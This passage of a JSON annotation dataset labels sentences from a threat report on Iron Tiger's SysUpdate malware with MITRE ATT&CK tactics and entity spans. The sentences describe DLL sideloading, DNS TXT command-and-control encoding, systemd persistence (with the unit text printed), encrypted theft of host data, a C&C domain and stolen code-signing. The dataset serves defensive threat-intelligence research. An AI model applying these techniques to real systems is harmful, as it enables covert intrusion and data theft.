"aptnotes", "doc_id": "21_aptnotes_report", "page_number": 3, "sentence_id": 25, "context_before": "We identified the executables and sideloaded files as follows:\nLegitimate Loaded binary application name Certificate signer Side-loaded DLL name file name INISafeWebSSO.exe Initech inicore_v2.3.30.dll inicore_v2.3.30.bin rc.exe Microsoft rcdll.dll rcdll.bin dlpumgr32.exe DESlock DLPPREM32.dll sv.bin GDFInstall.exe UBISOFT GameuxInstallHelper.", "sentence_text": "DLL sysconfig.bin ENTERTAINMENT route-null.exe Wazuh libwazuhshared.dll wazuhext.bin route-null.exe Wazuh libwazuhshared.dll agent-config.bin wazuh-agent.exe Wazuh libwinpthread-1.dll wazuhext.bin 3/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s26-7e747e", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 26, "context_before": "DLL sysconfig.bin ENTERTAINMENT route-null.exe Wazuh libwazuhshared.dll wazuhext.bin route-null.exe Wazuh libwazuhshared.dll agent-config.bin wazuh-agent.exe Wazuh libwinpthread-1.dll wazuhext.bin 3/11", "sentence_text": "We want to highlight that this is the first time we observed a threat actor abusing a sideloading vulnerability in a Wazuh signed executable.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s27-a1fc1d", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 27, "context_before": "We want to highlight that this is the first time we observed a threat actor abusing a sideloading vulnerability in a Wazuh signed executable.", "sentence_text": "Wazuh is a free and open source security platform, and we could confirm that one of the victims was using the legitimate Wazuh platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s28-629944", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 28, "context_before": "Wazuh is a free and open source security platform, and we could confirm that one of the victims was using the legitimate Wazuh platform.", "sentence_text": "It is highly likely that Iron Tiger specifically looked for this vulnerability to appear legitimate in the victim’s environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s29-a0b350", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 29, "context_before": "It is highly likely that Iron Tiger specifically looked for this vulnerability to appear legitimate in the victim’s environment.", "sentence_text": "We have notified the affected victim of this intrusion but received no feedback.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s30-90ee41", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 30, "context_before": "We have notified the affected victim of this intrusion but received no feedback.", "sentence_text": "Screenshot grab\nProcess manager (browses and terminates processes)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s31-addeea", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 31, "context_before": "Screenshot grab\nProcess manager (browses and terminates processes)", "sentence_text": "Command execution\nIron Tiger also added a feature that had not been seen before in this malware family:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s32-a372d0", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 32, "context_before": "Command execution\nIron Tiger also added a feature that had not been seen before in this malware family:", "sentence_text": "C&C communication through DNS TXT requests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s33-1e4733", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 33, "context_before": "C&C communication through DNS TXT requests.", "sentence_text": "While DNS is not supposed to be a communication protocol, the attacker abuses this protocol to send and receive information.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "The attacker uses DNS protocol to send and receive command and control data.", "entities": [ { "text": "abuses this protocol to send and receive information", "start": 71, "end": 123, "label": "Action" } ] }, { "uid": "aptnotes-21_aptnotes_report-p4-s34-453863", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 34, "context_before": "While DNS is not supposed to be a communication protocol, the attacker abuses this protocol to send and receive information.", "sentence_text": "First, the malware retrieves the configured DNS servers by calling the GetNetworkParams API function and parsing the DnsServerList linked list.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1016", "name": "System Network Configuration Discovery" } ], "procedure": "Retrieves DNS server configuration by calling GetNetworkParams API and parsing DnsServerList.", "entities": [ { "text": "malware", "start": 11, "end": 18, "label": "MalwareTool" }, { "text": "retrieves", "start": 19, "end": 28, "label": "Action" }, { "text": "DNS servers", "start": 44, "end": 55, "label": "Infrastructure_Indicator" }, { "text": "calling the GetNetworkParams API function", "start": 59, "end": 100, "label": "Action" }, { "text": "GetNetworkParams API function", "start": 71, "end": 100, "label": "MalwareTool" }, { "text": "parsing the DnsServerList linked list", "start": 105, "end": 142, "label": "Action" }, { "text": "DnsServerList linked list", "start": 117, "end": 142, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-21_aptnotes_report-p4-s35-c172eb", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 35, "context_before": "First, the malware retrieves the configured DNS servers by calling the GetNetworkParams API function and parsing the DnsServerList linked list.", "sentence_text": "If this method fails, the malware uses the DNS server operated by Google at IP address 8.8.8.8.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s36-c93677", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 36, "context_before": "If this method fails, the malware uses the DNS server operated by Google at IP address 8.8.8.8.", "sentence_text": "For the first request, the malware generates a random number of 32 bits and appends 0x2191 to it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s37-4a2dce", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 37, "context_before": "For the first request, the malware generates a random number of 32 bits and appends 0x2191 to it.", "sentence_text": "This results in six bytes — four for the random number, two for 0x2191 — and encodes the result further with Base32 algorithm using the alphabet “abcdefghijklmnopqrstuvwxyz012345”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s38-20fc24", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 38, "context_before": "This results in six bytes — four for the random number, two for 0x2191 — and encodes the result further with Base32 algorithm using the alphabet “abcdefghijklmnopqrstuvwxyz012345”.", "sentence_text": "Looking at Figure 2, the contacted domain name is after \"TXT\"; only the first four letters change as the rest of the encoded series is always the same.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s39-edf2d0", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 39, "context_before": "Looking at Figure 2, the contacted domain name is after \"TXT\"; only the first four letters change as the rest of the encoded series is always the same.", "sentence_text": "This is because the random number changes every time, but the end is the same “0x2191” result.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s40-920709", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 40, "context_before": "This is because the random number changes every time, but the end is the same “0x2191” result.", "sentence_text": "This explains why the first DNS request always ends with “reeaaaaaa.”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p4-s41-7da3a7", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 4, "sentence_id": 41, "context_before": "This explains why the first DNS request always ends with “reeaaaaaa.”.", "sentence_text": "If the C&C reply matches the format expected by the malware, it launches multiple threads that handle further commands and sends information about the infected machine.\n4/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p5-s42-30fb63", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 5, "sentence_id": 42, "context_before": "If the C&C reply matches the format expected by the malware, it launches multiple threads that handle further commands and sends information about the infected machine.\n4/11", "sentence_text": "Interestingly, the code related to this DNS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p5-s43-02e54a", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 5, "sentence_id": 43, "context_before": "Interestingly, the code related to this DNS", "sentence_text": "C&C communication is only present in samples that use it, meaning that the builder is modular and that there might be samples in the wild with unreported features.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p5-s44-b43897", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 5, "sentence_id": 44, "context_before": "C&C communication is only present in samples that use it, meaning that the builder is modular and that there might be samples in the wild with unreported features.", "sentence_text": "We continue monitoring this group and malware family for updates on possible variations of C&C communication protocols being abused.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p5-s45-2a5a36", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 5, "sentence_id": 45, "context_before": "We continue monitoring this group and malware family for updates on possible variations of C&C communication protocols being abused.", "sentence_text": "In all versions, the malware retrieves information on the infected machine and sends it to the C&C encrypted with DES.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p5-s46-4960b8", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 5, "sentence_id": 46, "context_before": "In all versions, the malware retrieves information on the infected machine and sends it to the C&C encrypted with DES.", "sentence_text": "Collected machine information includes the following:\nRandomly generated GUID Hostname Domain name Username User privileges Processor architecture Current process ID Operating system version Current file path Local IP address and port used to send the network packet The configuration is encrypted with a hardcoded DES key and is a few bytes long following the structure enumerated below:\nLength (in\nField content bytes)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p5-s47-b73e70", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 5, "sentence_id": 47, "context_before": "Collected machine information includes the following:\nRandomly generated GUID Hostname Domain name Username User privileges Processor architecture Current process ID Operating system version Current file path Local IP address and port used to send the network packet The configuration is encrypted with a hardcoded DES key and is a few bytes long following the structure enumerated below:\nLength (in\nField content bytes)", "sentence_text": "Comment Example Header 4", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p5-s48-d7f8e7", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 5, "sentence_id": 48, "context_before": "Comment Example Header 4", "sentence_text": "We only found one value 0x00000001 GUID 38 Follows the Microsoft format {89D0E853-FA08- 4f94-A5FE- A90E6869E074} Size of the C&C section 4 0x00000018 Size of the next C&C 4 0x00000014 domain name and", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p5-s49-8b361d", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 5, "sentence_id": 49, "context_before": "We only found one value 0x00000001 GUID 38 Follows the Microsoft format {89D0E853-FA08- 4f94-A5FE- A90E6869E074} Size of the C&C section 4 0x00000018 Size of the next C&C 4 0x00000014 domain name and", "sentence_text": "port C&C type 1 0x01 = regular C&C 0x01 0x05 = DNS tunneling 0x00", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p5-s50-3c587b", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 5, "sentence_id": 50, "context_before": "port C&C type 1 0x01 = regular C&C 0x01 0x05 = DNS tunneling 0x00", "sentence_text": "= regular C&C C&C domain name Variable dev.gitlabs.me Port number 4 0x00000050 5/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p6-s51-a21451", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 6, "sentence_id": 51, "context_before": "= regular C&C C&C domain name Variable dev.gitlabs.me Port number 4 0x00000050 5/11", "sentence_text": "Size of next section 4", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p6-s52-effd04", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 6, "sentence_id": 52, "context_before": "Size of next section 4", "sentence_text": "The folder is located either gtdcfp directory where files are in % copied Name of the executable Variable TextInputHost.exe vulnerable to side loading Name of the malicious Variable rc.dll side-loaded DLL Name of the binary file Variable rc.bin containing the encoded Stage 1 Name of the service or Variable gtdcfp registry key value used for persistence We noted that Stage 2 does not embed the configuration file, which is copied in memory by the previous stage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p6-s53-9b29d6", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 6, "sentence_id": 53, "context_before": "The folder is located either gtdcfp directory where files are in % copied Name of the executable Variable TextInputHost.exe vulnerable to side loading Name of the malicious Variable rc.dll side-loaded DLL Name of the binary file Variable rc.bin containing the encoded Stage 1 Name of the service or Variable gtdcfp registry key value used for persistence We noted that Stage 2 does not embed the configuration file, which is copied in memory by the previous stage.", "sentence_text": "We only saw one case where there was only one stage being decrypted in memory and the configuration was hardcoded.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p6-s54-cbe953", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 6, "sentence_id": 54, "context_before": "We only saw one case where there was only one stage being decrypted in memory and the configuration was hardcoded.", "sentence_text": "It is possible that this change is a consequence of the new DNS TXT records’ communication feature as it requires a domain name.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p6-s55-7c3b6e", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 6, "sentence_id": 55, "context_before": "It is possible that this change is a consequence of the new DNS TXT records’ communication feature as it requires a domain name.", "sentence_text": "SysUpdate samples for Linux While investigating SysUpdate’s infrastructure, we found some ELF files linked to some C&C servers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p6-s56-e261e0", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 6, "sentence_id": 56, "context_before": "SysUpdate samples for Linux While investigating SysUpdate’s infrastructure, we found some ELF files linked to some C&C servers.", "sentence_text": "We analyzed them and concluded that the files were a SysUpdate version made for the Linux platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p6-s57-d7e125", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 6, "sentence_id": 57, "context_before": "We analyzed them and concluded that the files were a SysUpdate version made for the Linux platform.", "sentence_text": "For example, the file handling functions are almost the same.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p6-s58-80731e", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 6, "sentence_id": 58, "context_before": "For example, the file handling functions are almost the same.", "sentence_text": "It is possible that the developer made use of the Asio library because of its portability across multiple platforms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p6-s59-96d42a", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 6, "sentence_id": 59, "context_before": "It is possible that the developer made use of the Asio library because of its portability across multiple platforms.", "sentence_text": "Some parameters can be passed to the binary (note that “Boolean” refers to Boolean data that is sent to the C&C):\nParameter Effect\n6/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p7-s60-a80d2f", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 7, "sentence_id": 60, "context_before": "Some parameters can be passed to the binary (note that “Boolean” refers to Boolean data that is sent to the C&C):\nParameter Effect\n6/11", "sentence_text": "-launch Sets persistence, zeroes boolean, and exits -run Zeroes boolean and continues -x Daemonize the process, zeroes boolean, and continues -i Daemonize the process, zeroes boolean, sets persistence, and continues -f Sets the GUID to and continues The persistence is ensured by copying a script similarly named as the current filename to the /usr/lib/systemd/system/ directory, and creating a symlink to this file in the /etc/ystem/system/multi-user.target.wants/ directory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p7-s61-aaed66", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 7, "sentence_id": 61, "context_before": "-launch Sets persistence, zeroes boolean, and exits -run Zeroes boolean and continues -x Daemonize the process, zeroes boolean, and continues -i Daemonize the process, zeroes boolean, sets persistence, and continues -f Sets the GUID to and continues The persistence is ensured by copying a script similarly named as the current filename to the /usr/lib/systemd/system/ directory, and creating a symlink to this file in the /etc/ystem/system/multi-user.target.wants/ directory.", "sentence_text": "Thus, this method only works if the current process has root privileges.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p7-s62-a87c03", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 7, "sentence_id": 62, "context_before": "Thus, this method only works if the current process has root privileges.", "sentence_text": "The content of the script is:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p7-s63-878d48", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 7, "sentence_id": 63, "context_before": "The content of the script is:", "sentence_text": "[Unit]\nDescription=xxx\n[Service]\nType=forking\nExecStart= -x ExecStop=/usr/bin/id", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p7-s64-91696e", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 7, "sentence_id": 64, "context_before": "[Unit]\nDescription=xxx\n[Service]\nType=forking\nExecStart= -x ExecStop=/usr/bin/id", "sentence_text": "[Install]\nWantedBy=multi-user.target\nAfter running the code dependent on the parameters, if the operator has not chosen a GUID with the “-f” parameter, the malware generates a random GUID and writes it to a file similarly named as the current file, with a “d” appended to it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p7-s65-bcc5b8", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 7, "sentence_id": 65, "context_before": "[Install]\nWantedBy=multi-user.target\nAfter running the code dependent on the parameters, if the operator has not chosen a GUID with the “-f” parameter, the malware generates a random GUID and writes it to a file similarly named as the current file, with a “d” appended to it.", "sentence_text": "Then, the malware retrieves information on the compromised computer and sends it to the C&C.\nThe following information is sent to the C&C, encrypted with a hardcoded key and DES CBC algorithm:\nGUID\nHost name\nUsername\nLocal IP address and port used to send the request Current PID Kernel version and machine architecture Current file path Boolean (0 if it was launched with exactly one parameter, 1 otherwise)\n7/11", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Collect system and user information from the compromised host and transmit it to the C2 server using encrypted communication.", "entities": [ { "text": "retrieves information on the compromised computer", "start": 18, "end": 67, "label": "Action" }, { "text": "sends it to the C&C", "start": 72, "end": 91, "label": "Action" }, { "text": "encrypted with a hardcoded key and DES CBC algorithm", "start": 139, "end": 191, "label": "Action" }, { "text": "C&C", "start": 88, "end": 91, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-21_aptnotes_report-p8-s66-221ad4", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 8, "sentence_id": 66, "context_before": "Then, the malware retrieves information on the compromised computer and sends it to the C&C.\nThe following information is sent to the C&C, encrypted with a hardcoded key and DES CBC algorithm:\nGUID\nHost name\nUsername\nLocal IP address and port used to send the request Current PID Kernel version and machine architecture Current file path Boolean (0 if it was launched with exactly one parameter, 1 otherwise)\n7/11", "sentence_text": "For the DNS C&C communication version, the malware retrieves the configured DNS server by reading the content of the /etc/resolv.conf file, or uses the DNS server operated by Google at IP address 8.8.8.8.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p8-s67-21234e", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 8, "sentence_id": 67, "context_before": "For the DNS C&C communication version, the malware retrieves the configured DNS server by reading the content of the /etc/resolv.conf file, or uses the DNS server operated by Google at IP address 8.8.8.8.", "sentence_text": "For these reasons, we would not be surprised to see SysUpdate samples for the Mac OS platform in the future.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p8-s68-cf3776", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 8, "sentence_id": 68, "context_before": "For these reasons, we would not be surprised to see SysUpdate samples for the Mac OS platform in the future.", "sentence_text": "Certificate compromise\nAnother interesting part of this campaign is the fact that some of the malicious files are signed with a certificate with the following signer: “Permyakov Ivan Yurievich IP”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p8-s69-dd3be7", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 8, "sentence_id": 69, "context_before": "Certificate compromise\nAnother interesting part of this campaign is the fact that some of the malicious files are signed with a certificate with the following signer: “Permyakov Ivan Yurievich IP”.", "sentence_text": "Looking for that name in search engines brings results from the official VMProtect website.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p8-s70-f33c04", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 8, "sentence_id": 70, "context_before": "Looking for that name in search engines brings results from the official VMProtect website.", "sentence_text": "The email address linked to the Authenticode certificate also links to that domain name.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p8-s71-00a15a", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 8, "sentence_id": 71, "context_before": "The email address linked to the Authenticode certificate also links to that domain name.", "sentence_text": "VMProtect is a commercial software intended to make analysis of code extremely difficult by implementing a custom virtual machine with non-standard architecture.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p8-s72-9deb70", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 8, "sentence_id": 72, "context_before": "VMProtect is a commercial software intended to make analysis of code extremely difficult by implementing a custom virtual machine with non-standard architecture.", "sentence_text": "The software has been used by multiple APT and cybercrime groups in the past to obfuscate their malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p8-s73-6c4500", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 8, "sentence_id": 73, "context_before": "The software has been used by multiple APT and cybercrime groups in the past to obfuscate their malware.", "sentence_text": "When searching on malware repositories for other files signed by the same certificate, we find multiple files named “VMProtectDemo.exe”, “VMProtect.exe”, or “VMProtect_Con.exe”, which suggests that an official demo version of VMProtect is also signed by this certificate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p8-s74-512ae1", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 8, "sentence_id": 74, "context_before": "When searching on malware repositories for other files signed by the same certificate, we find multiple files named “VMProtectDemo.exe”, “VMProtect.exe”, or “VMProtect_Con.exe”, which suggests that an official demo version of VMProtect is also signed by this certificate.", "sentence_text": "It appears that the threat actor managed to retrieve the private key allowing him to sign malicious code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p8-s75-914fec", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 8, "sentence_id": 75, "context_before": "It appears that the threat actor managed to retrieve the private key allowing him to sign malicious code.", "sentence_text": "As of this writing, the certificate is now revoked.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p8-s76-9cb2ab", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 8, "sentence_id": 76, "context_before": "As of this writing, the certificate is now revoked.", "sentence_text": "Using stolen certificates to sign malicious code is a common practice for this threat actor, as we already highlighted in 2015 and in all our recent investigations.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1553.002", "name": "Code Signing" } ], "procedure": "Threat actor signs malicious code using stolen certificates to evade detection.", "entities": [ { "text": "this threat actor", "start": 74, "end": 91, "label": "ThreatActor" }, { "text": "Using stolen certificates to sign malicious code", "start": 0, "end": 48, "label": "Action" } ] }, { "uid": "aptnotes-21_aptnotes_report-p8-s77-15dfc2", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 8, "sentence_id": 77, "context_before": "Using stolen certificates to sign malicious code is a common practice for this threat actor, as we already highlighted in 2015 and in all our recent investigations.", "sentence_text": "In late January 2023, a Redline stealer sample (detected by Trend Micro as TrojanSpy.Win32.REDLINE.YXDA1Z, SHA256:\ne24b29a1df287fe947018c33590a0b443d6967944b281b70fba7ea6556d00109) signed by the same certificate was uploaded.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p8-s78-192d51", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 8, "sentence_id": 78, "context_before": "In late January 2023, a Redline stealer sample (detected by Trend Micro as TrojanSpy.Win32.REDLINE.YXDA1Z, SHA256:\ne24b29a1df287fe947018c33590a0b443d6967944b281b70fba7ea6556d00109) signed by the same certificate was uploaded.", "sentence_text": "Infection vector\n8/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p9-s79-b3aa38", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 9, "sentence_id": 79, "context_before": "Infection vector\n8/11", "sentence_text": "We did not find an infection vector.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p9-s80-d9e0f0", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 9, "sentence_id": 80, "context_before": "We did not find an infection vector.", "sentence_text": "However, we noticed that one of the executables packed with VMProtect and signed with the stolen certificate was named “youdu_client_211.9.194.exe”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p9-s81-9a485d", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 9, "sentence_id": 81, "context_before": "However, we noticed that one of the executables packed with VMProtect and signed with the stolen certificate was named “youdu_client_211.9.194.exe”.", "sentence_text": "Youdu is the name of a Chinese instant messaging application aimed for use of enterprise customers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p9-s82-59849c", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 9, "sentence_id": 82, "context_before": "Youdu is the name of a Chinese instant messaging application aimed for use of enterprise customers.", "sentence_text": "The properties of the malicious file also match the usual Youdu version numbering.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p9-s83-23e675", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 9, "sentence_id": 83, "context_before": "The properties of the malicious file also match the usual Youdu version numbering.", "sentence_text": "However, the legitimate files are signed with a “Xinda.im” certificate instead of the stolen VMProtect certificate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p9-s84-e335cd", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 9, "sentence_id": 84, "context_before": "However, the legitimate files are signed with a “Xinda.im” certificate instead of the stolen VMProtect certificate.", "sentence_text": "installer (right)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p9-s85-c2ac14", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 9, "sentence_id": 85, "context_before": "installer (right)", "sentence_text": "As seen in the product name identified in the malicious file’s properties, we searched for possible products named “i Talk” but did not find any that could be related to this investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p9-s86-51948e", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 9, "sentence_id": 86, "context_before": "As seen in the product name identified in the malicious file’s properties, we searched for possible products named “i Talk” but did not find any that could be related to this investigation.", "sentence_text": "However, we found traces of files from the legitimate Youdu chat application signed by Xinda.im being copied to folders named “i Talk” on one victim’s computer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p9-s87-5d93b9", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 9, "sentence_id": 87, "context_before": "However, we found traces of files from the legitimate Youdu chat application signed by Xinda.im being copied to folders named “i Talk” on one victim’s computer.", 